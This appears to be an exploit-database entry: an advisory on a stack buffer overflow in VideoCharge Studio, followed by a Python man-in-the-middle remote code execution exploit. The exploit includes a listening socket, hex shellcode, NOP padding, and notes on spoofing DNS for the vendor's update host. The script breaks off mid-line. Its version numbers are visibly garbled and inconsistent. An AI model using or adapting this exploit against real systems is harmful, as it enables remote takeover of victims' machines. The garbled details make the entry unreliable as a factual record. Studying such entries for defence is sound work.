source: https://www.securityfocus.com/bid/65685/info VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions. VideoCharge Studio 220.127.116.115 is vulnerable; other versions may also be affected. #!/usr/bin/python # Exploit Title: VideoCharge Studio v18.104.22.1685 cc.dll GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass) # Version: v22.214.171.1245 # Date: 2014-02-18 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.videocharge.com # Tested on: Win7-GER (DEP enabled) # # Howto / Notes: # Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability # from socket import * from struct import pack from time import sleep host = "192.168.0.1" port = 80 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr # Thanks Giuseppe D'Amore for the amazing shellcode # http://www.exploit-db.com/exploits/28996/ shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+ "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+ "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+ "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+ "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+ "\x49\x0b\x31\xc0\x51\x50\xff\xd7") junk0 = "\x90" * 1277 junk1 = "\x90" * 1900 nops="\x90" * 30 jmpesp=pack('